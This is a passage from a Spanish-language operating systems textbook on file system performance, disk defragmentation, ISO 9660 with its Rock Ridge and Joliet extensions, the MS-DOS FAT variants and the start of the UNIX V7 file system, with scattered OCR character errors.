ta manera, el sistema de archivos puede hacer una estimación razonable acerca de si debe utilizar o 
no la lectura adelantada. Si se equivoca de vez en cuando, no es un desastre, sólo un poco de ancho 
de banda de disco desperdiciado. 


Reducción del movimiento del brazo del disco 

El uso de caché y la lectura adelantada no son las únicas formas de incrementar el rendimiento del 
sistema de archivos. Otra técnica importante es reducir la cantidad de movimiento del brazo del dis¬ 
co, al colocar los bloques que tengan una buena probabilidad de utilizarse en secuencia cerca unos 
de otros, de preferencia en el mismo cilindro. Cuando se escribe un archivo de salida, el sistema de 
archivos tiene que asignar los bloques uno a la vez, bajo demanda. Si los bloques libres se registran 
en un mapa de bits y todo el mapa de bits se encuentra en la memoria principal, es bastante senci¬ 
llo elegir un bloque libre lo más cerca posible del bloque anterior. Con una lista de bloques libres, 
parte de la cual está en el disco, es mucho más difícil asignar bloques que estén cerca unos de otros. 

Sin embargo, incluso con una lista de bloques libres, se puede llevar a cabo cierta agrupación de 
bloques. El truco es llevar la cuenta del almacenamiento de disco no en bloques, sino en grupos de blo¬ 
ques consecutivos. Si todos los sectores consisten de 512 bytes, el sistema podría utilizar bloques 
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de 1 KB (2 sectores) pero asignar almacenamiento del disco en unidades de 2 bloques (4 sectores). 
Esto no es lo mismo que tener bloques de disco de 2 KB, ya que la caché seguiría utilizando bloques 
de 1 K B y las transferencias de disco seguirían siendo de 1 K B, pero al leer un archivo en forma se- 
cuencial en un sistema que de otra manera estaría inactivo, se reduciría el número de búsquedas por 
un factor dedos, lo cual mejoraría el rendimiento en forma considerable. Una variación en el mismo 
tema es tomar en cuenta el posicionamiento rotacional. Al asignar bloques, el sistema intenta colo¬ 
car bloques consecutivos en un archivo en el mismo cilindro. 

Otro factor que reduce el rendimiento en los sistemas que utilizan nodos-i o cualquier cosa co¬ 
mo ellos es que al leer incluso hasta un archivo corto, se requieren dos accesos: uno para el nodo-i 
y otro para el bloque. La colocación común de nodos-i se muestra en la figura 4-29(a). Aquí todos 
los nodos están cerca del principio del disco, por lo que la distancia promedio entre un nodo-i y sus 
bloques será de aproximadamente la mitad del número de cilindros, con lo cual se requieren bús¬ 
quedas extensas. 


Los nodos-i 
se localizan 
cerca del 



El disco se divide en grupos 
de cilindros, cada uno 
con sus propios nodos-i 


(a) 


(b) 



Figura 4-29. (a) Los nodos-i colocados al principio del disco, (b) Disco dividido en 
grupos de cilindros, cada uno con sus propios bloques y nodos-i. 


Una mejora fácil en el rendimiento es colocar los nodos-i en medio del disco, en vez de hacer¬ 
lo al principio, con lo cual se reduce la búsqueda promedio entre el nodo-i y el primer bloque por 
un factor de dos. Otra idea, que se muestra en la figura 4-29(b), es dividir el disco en grupos de ci¬ 
lindros, cada uno con sus propios nodos-i, bloques y lista de bloques libres (M cKusick y colabora¬ 
dores, 1984). Al crear un nuevo archivo, se puede elegir cualquier nodo-i, pero se hace un intento 
por encontrar un bloque en el mismo grupo de cilindros que el nodo-i. Si no hay uno disponible, 
entonces se utiliza un bloque en un grupo de cilindros cercano. 


4.4.5 Desfragmentación de discos 

Cuando el sistema operativo se instala por primera vez, los programas y archivos que necesita se 
instalan en forma consecutiva, empezando al principio del disco, cada uno siguiendo directamente 
del anterior. Todo el espacio libre en el disco está en una sola unidad contigua que va después 
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de los archivos instalados. Sin embargo, a medida que transcurre el tiempo se crean y eliminan ar¬ 
chivos, general mente el disco se fragmenta mucho, con archivos y huecos esparcidos por todas par¬ 
tes. Como consecuencia, cuando se crea un nuevo archivo, los bloques que se utilizan para éste 
pueden estar esparcidos por todo el disco, lo cual produce un rendimiento pobre. 

El rendimiento se puede restaurar moviendo archivos para hacerlos contiguos y colocando to¬ 
do el espacio libre (o al menos la mayoría) en una o más regiones contiguas en el disco. Windows 
tiene un programa llamado defrag, el cual realiza esto. Los usuarios de Windows deben ejecutarlo 
en forma regular. 

La desfragmentación funciona mejor en los sistemas de archivos que tienen una buena can¬ 
tidad de espacio libre en una región continua al final de la partición. Este espacio permite al pro¬ 
grama de desfragmentación seleccionar archivos fragmentados cerca del inicio de la partición, 
copiando todos sus bloques al espacio libre. Esta acción libera un bloque contiguo de espacio 
cerca del inicio de la partición en la que se pueden colocar los archivos originales u otros en for¬ 
ma contigua. Después, el proceso se puede repetir con el siguiente pedazo de espacio en el disco 
y así en lo sucesivo. 

Algunos archivos no se pueden mover, incluyendo el archivo de paginación, el de hibernación 
y el registro por bitácora, ya que la administración requerida para ello es más problemática de lo que 
ayuda. En algunos sistemas, éstas son áreas contiguas de tamaño fijo de todas formas, por lo que no 
se tienen que desfragmentar. La única vez cuando su falta de movilidad representa un problema es 
cuando se encuentran cerca del final de la partición y el usuario desea reducir su tamaño. La única 
manera de resolver este problema es quitar todos los archivos, cambiar el tamaño de la partición y 
después recrearlos. 

Los sistemas de archivos de Linux (en especial ext2 y ext3) por lo general sufren menos por la 
desfragmentación que los sistemas Windows debido a la forma en que se seleccionan los bloques 
de disco, por lo que raras veces se requiere una desfragmentación manual. 


4.5 EJEMPLOS DE SISTEMAS DE ARCHIVOS 

En las siguientes secciones analizaremos varios sistemas de archivos de ejemplo, que varían desde 
los muy simples hasta algunos más sofisticados. Como los sistemas modernos de UNIX y el siste¬ 
ma de archivos nativo de Windows Vista se cubren en el capítulo acerca de UNIX (capítulo 10) y 
en el capítulo acerca de Windows Vista (capítulo 11), no cubriremos estos sistemas aquí. Sin em¬ 
bargo, a continuación examinaremos sus predecesores. 


4.5.1 Sistemas de archivos de CD-ROM 

Como nuestro primer ejemplo de un sistema de archivos, vamos a considerar los sistemas de archi¬ 
vos utilizados en CD-ROM s. Estos sistemas son particularmente simples, debido a que fueron di¬ 
señados para medios en los que sólo se puede escribir una vez. Entre otras cosas, por ejemplo, no 
tienen provisión para llevar el registro de los bloques libres, debido a que en un CD-ROM no se 
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pueden liberar ni agregar archivos después de fabricar el disco. A continuación analizaremos el ti¬ 
po principal de sistema de archivos de CD-ROM y dos extensiones del mismo. 

Algunos años después de que el CD-ROM hizo su debut, se introdujo el CD-R (CD regraba- 
ble). A diferencia del CD-ROM, es posible agregar archivos después del quemado inicial, pero és¬ 
tos simplemente se adjuntan al final del CD-R. Los archivos nunca se eliminan (aunque el directorio 
se puede actualizar para ocultar los archivos existentes). Como consecuencia de este sistema de ar¬ 
chivos de "sólo adjuntar", no se alteran las propiedades fundamentales. En especial, todo el espa¬ 
cio se encuentra en un trozo contiguo al final del CD. 


El sistema de archivos ISO 9660 

El estándar más común para los sistemas de archivos de CD-ROM se adoptó como un Estándar In¬ 
ternacional en 1998, bajo el nombre ISO 9660. Casi cualquier CD-ROM que se encuentra actual¬ 
mente en el mercado es compatible con este estándar, algunas veces con las extensiones que 
analizaremos a continuación. U no de los objetivos de este estándar era hacer que cada CD-ROM se 
pudiera leer en todas las computadoras, independientemente del orden de bytes utilizado y del sis¬ 
tema operativo que se emplee. Como consecuencia, se impusieron algunas limitaciones en el siste¬ 
ma de archivos para que los sistemas operativos más débiles que estaban en uso (como M S-DOS) 
pudieran leerlo. 

Los CD-ROM s no tienen cilindros concéntricos como los discos magnéticos. En vez de ello 
hay una sola espiral continua que contiene los bits en una secuencia lineal (aunque son posibles 
las búsquedas a través de la espiral). Los bits a lo largo de la espiral se dividen en bloques lógi¬ 
cos (también conocidos como sectores lógicos) de 2352 bytes. A Igunos de éstos son para preám¬ 
bulos, corrección de errores y demás gasto adicional. La porción de carga de cada bloque lógico 
es de 2048 bytes. Cuando se utilizan para música, los CDs tienen ranuras de introducción, ranu¬ 
ras de salida y espacios entre las pistas, pero éstos no se utilizan para los CD-ROM s de datos. A 
menudo la posición de un bloque a lo largo de la espiral se expresa en minutos y segundos. Se 
puede convertir en un número de bloque lineal utilizando el factor de conversión de 1 seg = 75 
bloques. 

ISO 9660 soporta conjuntos de C D-ROM s con hasta 2^® - 1 CDs en el conjunto. Los CD-ROM s 
individuales también se pueden particionar en volúmenes lógicos (particiones). Sin embargo, a conti¬ 
nuación nos concentraremos en ISO 9660 para un solo CD-ROM sin particiones. 

Cada CD-ROM empieza con 16 bloques cuya función no está definida por el estándar ISO 
9660. Un fabricante de CD-ROMs podría utilizar esta área para proporcionar un programa de 
arranque para permitir que la computadora se inicie desde el CD-ROM o para algún otro propósi¬ 
to. A continuación le sigue un bloque que contiene el descriptor de volumen primario, que con¬ 
tiene cierta información general acerca del CD-ROM. Esta información incluye el identificador 
del sistema (32 bytes), el identificador del volumen (32 bytes), el identificador del publicador(128 
bytes) y el identificador del preparador de datos (128 bytes). El fabricante puede llenar estos cam¬ 
pos de cualquier forma que lo desee, excepto que sólo se pueden utilizar letras mayúsculas, dígi¬ 
tos y un número muy reducido de signos de puntuación para asegurar la compatibilidad entre 
plataformas. 
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El descriptor de volumen primario también contiene los nombres de tres archivos, que pueden 
contener el resumen, el aviso de copyright e información bibliográfica, respectivamente. Además 
también hay varios números clave presentes, incluyendo el tamaño del bloque lógico (por lo gene¬ 
ral de 2048, pero se permiten 4096, 8192 y potencias de dos grandes en ciertos casos), el número 
de bloques en el CD-ROM , las fechas de creación y expiración del CD-ROM . Por último, el des¬ 
criptor de volumen primario también contiene una entrada de directorio para el directorio raíz, que 
indica en dónde se puede encontrar en el CD-ROM (es decir, en qué bloque empieza). A partir de 
este directorio se puede localizar el resto del sistema de archivos. 

Además del descriptor de volumen primario, un CD-ROM puede contener un descriptor de vo¬ 
lumen suplementario. Contiene información similar a la del primario, pero eso no es de importan¬ 
cia para nosotros aquí. 

El directorio raíz, con todos los demás directorios relacionados, consiste de un número varia¬ 
ble de entradas, la última de las cuales contiene un bit que la marca como la última. Las mismas en¬ 
tradas de directorio son también de longitud variable. Cada entrada de directorio puede tener de 10 
a 12 campos, algunos de los cuales están en ASCII y otros son campos numéricos en binario. Los 
campos binarios están codificados dos veces, una vez en formato littie endian (que se utiliza en Pen- 
tiums, por ejemplo) y otra vez en formato big endian (que se utiliza en SPARCs, por ejemplo). Así, 
un número de 16 bits utiliza 4 bytes y un número de 32 bits utiliza 8 bytes. 

El uso de esta codificación redundante fue necesario para evitar lastimar los sentimientos de 
cualquiera cuando se desarrolló el estándar. Si el estándar hubiera dictado el formato littie endian, 
entonces las personas de empresas cuyos productos tuvieran el formato big endian se hubieran sen¬ 
tido como ciudadanos de segunda clase y no hubieran aceptado el estándar. El contenido emocio¬ 
nal de un CD-ROM puede entonces cuantificarse y medirse exactamente en kilobytes/hora de 
espacio desperdiciado. 

El formato de una entrada de directorio ISO 9660 se ilustra en la figura 4-30. Como las entra¬ 
das de directorios tienen longitudes variables, el primer campo es un byte que indica qué tan larga 
es la entrada. Este byte está definido para tener el bit de mayor orden a la izquierda, para evitar cual¬ 
quier ambigüedad. 
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1 

1 

8 

8 

7 

1 

2 
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1 
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L 
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archivo 

i Sist: 


H 
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atributo extendido 


Longitud de entrada de directorio 
Figura 4-30. La entrada de directorio ISO 9660, 


Banderas' 

Intercalado 


Nombre base 


Ext 


Ver 


Las entradas de directorio pueden tener de manera opcional atributos extendidos. Si se utiliza 
esta característica, el segundo byte indica qué tan largos son los atributos extendidos. 
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A continuación viene ei bioque iniciai dei archivo en sí. Los archivos se aimacenan como se¬ 
ries contiguas de bioques, por io que ia ubicación de un archivo está compietamente especificada 
por ei bioque iniciai y ei tamaño, que está contenido en ei siguiente campo. 

La fecha y hora en que se grabó ei CD-ROM seaimacena en ei siguiente campo, con bytes se¬ 
parados para ei año, mes, día, hora, minuto, segundo y zona horaria. Los años empiezan a contar 
desde 1900, io cuai significa que ios CD-ROM sufrirán un probiema en ei año 2156, debido a que 
ei año después dei 2155 será 1900. Este probiema se podría haber retrasado ai definir ei origen dei 
tiempo como 1988 (ei año en que se adoptó ei estándar). Si se hubiera hecho eso, ei probiema se 
hubiera pospuesto hasta ei 2244. Los 88 años extra son útiies. 

Ei campo Banderas contiene unos cuantos bits misceiáneos, inciuyendo uno para ocuitar ia en¬ 
trada en ios iistados (una característica que se copió de M S-DOS): uno para diferenciar una entra¬ 
da que es un archivo de una entrada que es un directorio, una para permitir ei uso de ios atributos 
extendidos y una para marcar ia úitima entrada en un directorio. También hay unos cuantos bits pre¬ 
sentes en este campo, pero no son de importancia aquí. Ei siguiente campo trata sobre ia intercaia- 
ción de partes de archivos en una manera que no se utiiiza en ia versión más simpie de ISO 9660, 
por lo que no veremos con más detalle. 

El siguiente campo indica en qué CD-ROM se encuentra el archivo. Se permite que una entra¬ 
da de directorio en un CD-ROM haga referencia a un archivo ubicado en otro CD-ROM en el con¬ 
junto. De esta forma, es posible crear un directorio maestro en el primer CD-ROM que liste todos 
los archivos en todos los CD-ROM del conjunto completo. 

El campo marcado como L en la figura 4-30 proporciona el tamaño del nombre del archivo en 
bytes. Va seguido del nombre del archivo en sí. U n nombre de archivo consiste en un nombre base, 
un punto, una extensión, un punto y coma y un número de versión binario (1 o 2 bytes). El nombre 
base y la extensión pueden utilizar letras mayúsculas, los dígitos del 0 al 9 y el carácter de guión ba¬ 
jo. Todos los demás caracteres están prohibidos, para asegurar que cada computadora pueda mane¬ 
jar cada nombre de archivo. El nombre base puede ser de hasta ocho caracteres: la extensión puede 
ser de hasta tres caracteres. Estas opciones se impusieron debido a la necesidad de tener compatibi¬ 
lidad con M S-DOS. Un nombre de archivo puede estar presente en un directorio varias veces, siem¬ 
pre y cuando cada uno tenga un número de versión distinto. 

Los últimos dos campos no siempre están presentes. El campo Relleno se utiliza para forzar a 
que cada entrada de directorio sea un número par de bytes, para alinear los campos numéricos de 
las entradas subsiguientes en límites de 2 bytes. Si se necesita relleno, se utiliza un byte 0. Por úl¬ 
timo tenemos el campo U so del sistema, sist. Su función y tamaño no están definidos, excepto que 
debe ser un número par de bytes. Los distintos sistemas lo utilizan en formas diferentes. Por ejem¬ 
plo, la M acintosh mantiene las banderas Finder aquí. 

Las entradas dentro de un directorio se listan en orden alfabético, excepto por las primeras dos. 
La primera entrada es para el directorio en sí. La segunda es para su padre. En este aspecto, estas 
son similares a las entradas de directorio . y .. de UNIX. Los archivos en sí no necesitan estar en or¬ 
den de directorio. 

No hay un límite explícito en cuanto al número de entradas en un directorio. Sin embargo, hay 
un límite en cuanto a la profundidad de anidamiento. La máxima profundidad de anidamiento de 
directorios es ocho. Este límite se estableció en forma arbitraria para simplificar las implementa- 
ciones. 
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ISO 9660 define lo que se conoce como tres niveles. El nivel 1 es el más restrictivo y especi¬ 
fica que los nombres de archivos están limitados a 8 -i- 3 caracteres: también requiere que todos los 
archivos sean contiguos, como hemos visto antes. Además, especifica que los nombres de directo¬ 
rio deben estar limitados a ocho caracteres sin extensiones. El uso de este nivel maximiza las pro¬ 
babilidades de que un CD-ROM se pueda leer en todas las computadoras. 

El nivel 2 redúcela restricción de longitud. Permite que los archivos y directorios tengan nom¬ 
bres de hasta 31 caracteres, pero siguen teniendo el mismo conjunto de caracteres. 

El nivel 3 utiliza los mismos límites de nombres que el nivel 2, pero reduce parcialmente la res¬ 
tricción de que los archivos tienen que ser contiguos. Con este nivel, un archivo puede consistir de 
varias secciones (fragmentos), cada una de las cuales es una serie contigua de bloques. La misma 
serie puede ocurrir varias veces en un archivo y también puede ocurrir en dos o más archivos. Si se 
repiten grandes trozos de datos en varios archivos, el nivel 3 ofrece cierta optimización del espacio 
al no requerir que los datos estén presentes varias veces. 

Extensiones Rock Ridge 

Como hemos visto, ISO 9660 es altamente restrictivo en varias formas. Poco después de que salió 
al mercado, las personas en la comunidad UNIX empezaron a trabajar en una extensión para que 
fuera posible representar los sistemas de archivos de UNIX en un CD-ROM . Estas extensiones se 
llamaron Rock Ridge, en honor a una ciudad de la película Blazing Saddies de Gene Wilder, pro¬ 
bablemente debido a que a uno de los miembros del comité le gustó el filme. 

Las extensiones utilizan el campo Uso del sistema para que los CD-ROM s Rock Ridge se pue¬ 
dan leer en cualquier computadora. Todos los demás campos retienen su significado normal de ISO 
9660. Cualquier sistema que no esté al tanto de las extensiones Rock Ridge sólo las ignora y ve un 
CD-ROM normal. 

Las extensiones se dividen en los siguientes campos: 

1. PX - Atributos POSIX. 

2. PN - Números de dispositivos mayores y menores. 

3. SL - Vínculo simbólico. 

4. NM - Nombre alternativo. 

5. CL - Ubicación del hijo. 

6. PL - Ubicación del padre. 

7. RE - Reubicación. 

8. TE - Estampado de tiempo. 

El campo PX contiene los bits de permiso estándar rwxrwxrwx de U NIX para el propietario, el gru¬ 
po y los demás. También contiene los otros bits contenidos en la palabra de modo, como los bits 
SETUID y SETGID, etcétera. 
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Para permitir que ios dispositivos puros se representen en un CD-ROM , está presente ei campo 
PN, ei cuai contiene ios números de dispositivos mayores y menores asociados con ei archivo. De 
esta forma, ei contenido dei directorio /dev se puede escribir en un CD-ROM y después reconstruir¬ 
se de manera correcta en ei sistema de destino. 

Ei campo SL es para ios víncuios simbóiicos. Permite que un archivo en un sistema de archi¬ 
vos haga referencia a un archivo en un sistema de archivos distinto. 

Tai vez ei campo más importante sea N M. Este campo permite asociar un segundo nombre con 
ei archivo. Este nombre no está sujeto a ias restricciones dei conjunto de caracteres o de iongitud de 
ISO 9660, con lo cual es posible expresar nombres de archivos de UN IX arbitrarios en un CD-ROM . 

Los siguientes tres campos se utilizan en conjunto para sobrepasar el límite de ISO 9660 de los 
directorios que sólo pueden tener ocho niveles de anidamiento. M ediante su uso es posible especi¬ 
ficar que un directorio se va a reubicar e indicar cuál es su posición en la jerarquía. Es en efecto una 
manera de solucionar el límite de profundidad artificial. 

Por último, el campo TF contiene los tres estampados de tiempo incluidos en cada nodo-i de 
UNIX, a saber la hora en que se creó el archivo, la hora en que se modificó por última vez, y la ho¬ 
ra en la que se accedió por última vez. En conjunto, estas extensiones hacen que sea posible copiar 
un sistema de archivos UNIX a un CD-ROM y después restaurarlo de manera correcta en un siste¬ 
ma diferente. 

ExtensionesJ oliet 

La comunidad de UNIX no fue el único grupo que quería una manera de extender ISO 9660. A M i- 
crosoft también le pareció demasiado restrictivo (aunque fue el propio M S-DOS deM icrosoft quien 
causó la mayor parte de las restricciones en primer lugar). Por lo tanto, M icrosoft inventó ciertas 
extensiones, a las cuales llamó J oliet. Estas extensiones estaban diseñadas para permitir que los sis¬ 
temas de archivos de Windows se copiaran a CD-ROM y después se restauraran, precisamente en la 
misma forma que se diseñó Rock Ridge para UNIX. Casi todos los programas que se ejecutan en 
Windows y utilizan CD-ROM s tienen soporte para joliet, incluyendo los programas que queman 
CDs grabadles. Por lo general, estos programas ofrecen una elección entre los diversos niveles de 
ISO 9660 y joliet. 

Las principales extensiones que proporciona j oliet son: 

1. Nombres de archivos largos. 

2. Conjunto de caracteres U nicode. 

3. M ás de ocho niveles de anidamiento de directorios. 

4. Nombres de directorios con extensiones. 

La primera extensión permite nombres de archivos de hasta 64 caracteres. La segunda extensión 
permite el uso del conjunto de caracteres Unicode para los nombres de archivos. Esta extensión es 
importante para el software destinado a los países que no utilizan el alfabeto en latín, como japón, 
Israel y Grecia. Como los caracteres Unicode son de 2 bytes, el nombre de archivo más grande en 
j oliet ocupa 128 bytes. 
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Al igual que Rock Ridge, Joliet elimina la limitación en el anidamiento de directorios. Los di¬ 
rectorios se pueden anidar con tantos niveles como sea necesario. Por último, los nombres de los 
directorios pueden tener extensiones. No está claro por qué se incluyó esta extensión, ya que raras 
veces los directorios de Windows utilizan extensiones, pero tal vez algún día lo hagan. 

4.5.2 EI sistema de archivos M S-DO S 

El sistema de archivos M S-DOS es uno de los primeros sistemas que se incluyeron con la IBM PC. 
E ra el sistema pri nci pal hasta W i ndows 98 y W i ndows M E. A ún cuenta con soporte en W i ndows 2000, 
Windows XP y Windows Vista, aunque ya no es estándar en las nuevas PCs, excepto por los discos 
flexibles. Sin embargo, este sistema y una extensión de él (FAT-32) están teniendo mucho uso en va¬ 
rios sistemas incrustados. La mayoría de las cámaras digitales lo utilizan. M uchos reproductores de 
M P3 lo utilizan de manera exclusiva. El popular iPod deApple lo utiliza como el sistema de archivos 
predeterminado, aunque los hackers conocedores pueden volver a dar formato al iPod e instalar un sis¬ 
tema de archivos distinto. Así, el número de dispositivos electrónicos que utilizan el sistema de archi¬ 
vos M S-DOS es inmensamente grande en la actualidad, en comparación con cualquier momento en 
el pasado, y sin duda es mucho mayor que el número de dispositivos que utilizan el sistema de archi¬ 
vos NTFS más moderno. Por esta única razón, vale la pena analizarlo con cierto detalle. 

Para leer un archivo, un programa de M S-DOS primero debe realizar una llamada al sistema 
open para obtener un mane]ador para el archivo. La llamada al sistema open especifica una ruta, 
que puede ser absoluta o relativa al directorio de trabajo actual. Se realiza una búsqueda de la ru¬ 
ta, componente por componente, hasta que se localiza el directorio final y se lee en la memoria. 
Después se busca el archivo que se desea abrir. 

Aunque los directorios de M S-DOS tienen tamaños variables, utilizan una entrada de directo¬ 
rio de tamaño fijo de 32 bytes. El formato de una entrada de directorio de M S-DOS se muestra en 
la figura 4-31. Contiene el nombre de archivo, los atributos, la fecha y hora de creación, el bloque 
inicial y el tamaño exacto del archivo. Los nombres de archivo menores de 8 -f 3 caracteres se jus¬ 
tifican a la izquierda y se rellenan con espacios a la derecha, en cada campo por separado. El cam¬ 
po Atributos es nuevo y contiene bits para indicar que un archivo es de sólo lectura, que necesita 
archivarse, está oculto o que es un archivo del sistema. No se puede escribir en los archivos besó¬ 
lo lectura. Esto es para protegerlos de daños accidentales. El bit archivado no tiene una función del 
sistema operativo actual (es decir, M S-DOS no lo examina ni lo establece). La intención es permi¬ 
tir que los programas de archivos a nivel de usuario lo desactiven al archivar un archivo y que otros 
programas lo activen cuando modifiquen un archivo. De esta manera, un programa de respaldo só¬ 
lo tiene que examinar este bit de atributo en cada archivo para ver cuáles archivos debe respaldar. El 
bit oculto se puede establecer para evitar que un archivo aparezca en los listados de directorios. Su 
principal uso es para evitarconfundir a los usuarios novatos con los archivos que tal vez no entiendan. 
Por último, el bit del sistema también oculta archivos. Además, los archivos del sistema no pueden 
eliminarse de manera accidental mediante el uso del comando del. Los componentes principales de 
MS-DOS tienen activado este bit. 

La entrada de directorio también contiene la fecha y hora de creación del archivo o su última mo¬ 
dificación. L a hora sólo tiene una precisión de hasta ±2 segundos, debido a que se almacena en un cam¬ 
po de 2 bytes, que sólo puede almacenar 65,536 valores únicos (un día contiene 86,400 segundos). 
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Figura 4-31. La entrada de directorio de M S-DOS. 

El campo del tiempo se subdivide en segundos (5 bits), minutos (6 bits) y horas (5 bits). La fecha se 
cuenta en días usando tres subcampos: día (5 bits), mes (4 bits) y año desde 1980 (7 bits). Con un nú¬ 
mero de 7 bits para el año y la hora que empiezan en 1980, el mayor año que puede expresarse es 2107. 
Por lo tanto, MS-DOS tiene integrado un problema para el año 2108. Para evitar una catástrofe, los 
usuarios de M S-DOS deben empezar con la conformidad con el año 2108 lo más pronto posible. Si 
M S-DOS hubiera utilizado los campos combinados de fecha y hora como un contador de segundos de 
32 bits, podría haber representado cada segundo con exactitud y hubiera retrasado su catástrofe hasta 
el 2116. 

M S-DOS almacena el tamaño de archivo como un número de 32 bits, por lo que en teoría los 
archivos pueden ser tan grandes como 4 GB. Sin embargo, otros límites (que se describen a conti¬ 
nuación) restringen el tamaño máximo de un archivo a 2 GB o menos. De manera sorprendente, no 
se utiliza una gran parte de la entrada (10 bytes). 

MS-DOS lleva la cuenta de los bloques de los archivos mediante una tabla de asignación de ar¬ 
chivos (FAT) en la memoria principal. La entrada de directorio contiene el número del primer blo¬ 
que del archivo. Este número se utiliza como un índice en una FAT con entradas de 64 KB en la 
memoria principal. Al seguir la cadena, se pueden encontrartodos los bloques. La operación déla FAT 
se ilustra en la figura 4-12. 

El sistema de archivos FAT viene en tres versiones: FAT-12, FAT-16 y FAT-32, dependiendo de 
cuántos bits contenga una dirección de disco. En realidad, FAT-32 es algo así como un término equi¬ 
vocado, ya que sólo se utilizan los 28 bits de menor orden de las direcciones de disco. Debería ha¬ 
berse llamado FAT-28, pero las potencias de dos se oyen mucho mejor. 

Para todas las FATs, el bloque de disco se puede establecer en algún múltiplo de 512 bytes (po¬ 
siblemente distinto para cada partición), donde el conjunto de tamaños de bloque permitidos (lla¬ 
mados tamaños de grupo por M icrosoft) es distinto para cada variante. La primera versión de 
M S-DOS utilizaba FAT-12 con bloques de 512 bytes, para proporcionar un tamaño de partición má¬ 
ximo de 2^^ X 512 bytes (en realidad sólo son 4086 x 512 bytes, debido a que 10 de las direccio¬ 
nes de disco se utilizaban como marcadores especiales, como el de fin de archivo, el de bloque 
defectuoso, etc.). Con estos parámetros, el tamaño máximo de partición de disco era de aproxima¬ 
damente 2 M B y el tamaño de la tabla FAT en memoria era de 4096 entradas de 2 bytes cada una. 
Utilizar una entrada de tabla de 12 bits hubiera sido demasiado lento. 

Este sistema funcionaba bien para los discos flexibles, pero cuando salieron al mercado los dis¬ 
cos duros se convirtió en un problema. M icrosoft resolvió el problema al permitir tamaños de blo¬ 
que adicionales delKB,2KBy4KB. Este cambio preservó la estructura y el tamaño de la tabla 
FAT-12, pero permitía particiones de disco de hasta 16 M B. 
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Ya que M S-DOS soportaba cuatro particiones de disco por cada unidad de disco, ei nuevo sis¬ 
tema de archivos FAT-12 podía operar discos de hasta 64 M B. M ás aiiá de esa capacidad, aigo po¬ 
dría faiiar. Lo que ocurrió fue ia introducción de FAT-16, con apuntadores de disco de 16 bits. 
Además se permitieron tamaños de bioque de 8 KB, 16 KB y 32 KB (32,768 es ia potencia más 
grande de dos que se puede representar en 16 bits). La tabia FAT-16 ahora ocupaba 128 KB de me¬ 
moria principai todo ei tiempo, pero con ias memorias más grandes que para entonces había dispo- 
nibies, se utiiizó ampiiamentey reempiazó con rapidez ei sistema de archivos FAT-12. La partición 
de disco más grande que podía soportar FAT-16 era de 2 GB (64K entradas de 32 KB cada una) y 
ei disco más grande, 8 GB, a saber de cuatro particiones de 2 GB cada una. 

Para ias cartas comerciaies este i imite no es un probiema, pero para aimacenar video digitai uti- 
i izando ei estándar DV, un archivo de2 GB apenas si contiene 9 minutos de video. Como consecuen¬ 
cia dei hecho de que un disco de PC sóio puede soportar cuatro particiones, ei video más grande que 
se puede aimacenar en un disco es de aproximadamente 36 minutos, sin importar qué tan grande sea 
ei disco. Este iímite también significa que ei video más grande que se puede editar en iínea es de me¬ 
nos de 18 minutos, ya que se necesitan archivos de entrada y de saiida. 

Empezando con ia segunda versión de Windows 95, se introdujo ei sistema de archivos FAT-32 
con sus direcciones de disco de 28 bits, donde ia versión de M S-DOS que operaba bajo Windows 
95 se adaptó para dar soporte a FAT-32. En este sistema ias particiones podrían ser en teoría de 
228 X 2^^ bytes, pero en reaiidad están iimitadas a 2 TB (2048 GB) debido a que ei sistema iieva 
de manera interna ia cuenta de ios tamaños de ias particiones en sectores de 512 bytes utiiizando un 
número de 32 bits, y 2® x 2^^ es 2 TB. Ei tamaño máximo de partición para ios diversos tamaños 
de bioque y ios tres tipos de FAT se muestran en ia figura 4-32. 
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Figura 4-32. Tamaño máximo de partición para los distintos tamaños de bloque. Los 
cuadros vacíos representan combinaciones prohibidas. 

Además de soportar discos más grandes, ei sistema de archivos FAT-32 tiene otras dos venta¬ 
jas en comparación con FAT-16. En primer iugar, un disco de8 GB que utiiiza FAT-32 puede ser de 
una soia partición. Si utiiiza FAT-16 tiene que tener cuatro particiones, io cuai aparece para ei usua¬ 
rio de Windows como ias unidades de disco iógicas C:, D:, E: y F:. Depende dei usuario decidir 
qué archivo coiocar en cuái unidad y iievar ei registro de dónde se encuentran ias cosas. 

La otra ventaja de FAT-32 sobre FAT-16 es que para una partición de disco de cierto tamaño, se 
puede utiiizar un tamaño de bioque más pequeño. Por ejempio, para una partición de disco de2 GB, 
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FAT-16 debe utilizar bloques de 32 KB; de lo contrario, con solo 64K direcciones de disco dispo¬ 
nibles, no podrá cubrir toda la partición. Por el contrario, FAT-32 puede utilizar, por ejemplo, blo¬ 
ques de 4 KB para una partición de disco de 2 GB. La ventaja del tamaño de bloque más pequeño 
es que la mayoría de los archivos son mucho menores de 32 KB. Si el tamaño de bloque es de 
32 K B, un archivo de 10 bytes ocupa 32 K B de espacio en el disco. Si el archivo promedio es, por 
decir, de 8 KB, entonces con un bloque de 32 KB se desperdiciarán partes del disco, lo cual no 
es una manera muy eficiente de utilizarlo. Con un archivo de 8 KB y un bloque de 4 KB no hay 
desperdicio del disco, pero el precio a pagar es que la FAT ocupa más RAM . Con un bloque de 4 
KB y una partición de disco de 2 GB hay 512K bloques, por lo que la FAT debe tener 512K entra¬ 
das en la memoria (que ocupan 2 M B de RA M ). 

M S-DOS utiliza la FAT para llevar la cuenta de los bloques de disco libres. Cualquier bloque 
que no esté asignado en un momento dado se marca con un código especial. Cuando M S-DOS ne¬ 
cesita un nuevo bloque de disco, busca en la FAT una entrada que contenga este código. Por lo tan¬ 
to, no se requiere un mapa de bits o una lista de bloques libres. 


4.5.3 El sistema de archivos V7 de UNIX 

Incluso las primeras versiones de U NIX tenían un sistema de archivos multiusuario bastante sofis¬ 
ticado, ya que se derivaba de M ULTICS. A continuación analizaremos el sistema de archivos V7, 
diseñado para la PDP-11 que famoso hizo a UNIX. En el capítulo 10 examinaremos un sistema de 
archivos de UNIX moderno, en el contexto de Linux. 

El sistema de archivos está en la forma de un árbol que empieza en el directorio raíz, con la 
adición de vínculos para formar un gráfico acíclico dirigido. Los nombres de archivos tienen hasta 
14 caracteres y pueden contener cualquier carácter ASCII excepto / (debido a que es el separador 
entre los componentes en una ruta) y NUL (debido a que se utiliza para rellenar los nombres meno¬ 
res de 14 caracteres). NUL tiene el valor numérico de 0. 

Una entrada de directorio de UNIX contiene una entrada para cada archivo en ese directorio. 
Cada entrada es en extremo simple, ya que UNIX utiliza el esquema de nodos-i ilustrado en la fi¬ 
gura 4-13. Una entrada de directorio sólo contiene dos campos: el nombre del archivo (14 bytes) y 
